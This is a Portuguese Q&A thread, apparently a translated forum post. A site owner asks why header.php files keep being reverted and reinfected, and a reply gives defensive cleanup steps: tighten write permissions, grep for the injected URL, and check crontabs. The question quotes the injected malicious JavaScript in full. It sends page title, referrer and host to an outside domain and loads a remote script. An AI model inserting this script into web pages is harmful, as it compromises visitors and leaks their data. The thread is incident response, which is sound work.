Arquivos sendo revertidos para a versão anterior

0

Um dos meus sites estava infestado de malware e, desde então, vejo todos os dias alternados que os arquivos header.php são revertidos para versões anteriores (possivelmente por um script) e um script mal-intencionado é inserido em algum lugar do arquivo:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "(>>>> KEEPS CHANGING >>>>>)http://www.theorchardnursinghome.co.uk/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

Eu limpei o servidor muitas vezes, mas na veia.

Estou ciente de que a melhor opção é reinstalar todo o site, mas receio que seja um assunto arriscado, já que muitas personalizações foram feitas no passado e será preciso muito esforço para recriar toda a configuração.

Como me deparo com este problema? Como identificar o script (s) responsável pela execução de mais um script bash talvez? A execução de inotify não é uma possibilidade, pois o Hostgator não nos permite instalar.

    
por Ramnath 28.10.2015 / 11:49

1 resposta

1

Para começar, certifique-se de que seus arquivos .php e .html NÃO sejam graváveis pelo uid executado pelo servidor da web. O servidor da Web precisa de permissões de leitura e execução nos arquivos e diretórios, mas (possivelmente com algumas exceções, como diretórios de upload) ele não precisa de acesso de gravação aos dados que deveria estar atendendo.

Em seguida, grep all os arquivos do seu site (por exemplo, grep -ir pattern /var/www/ ) para algo específico desse malware. esse URL reinserido é uma boa escolha: grep -ir 'http://www.theorchardnursinghome.co.uk' /var/www/

Infelizmente, é possível que a maior parte da carga do ataque seja codificada com base64 ou similar, então o grep pode não encontrar nada.

na falta disso, o grepping para os arquivos que ele está modificando pode funcionar - por exemplo, grep para header.php - se ele grava em header.php, há uma chance razoável de que o nome do arquivo seja (esperançosamente não codificado) em algum lugar no script de ataque.

grep seus arquivos de registro da web para as mesmas coisas.

Se seus atacantes conseguiram ganhar raiz em seu servidor, há infinitas possibilidades de eles esconderem o que estão fazendo. Mas verifique, pelo menos, os crontabs do sistema, incluindo o crontab do root.

BTW, isso provavelmente pertence a Falha do servidor em vez de aqui. Ou talvez em webmasters

    
por 28.10.2015 / 12:23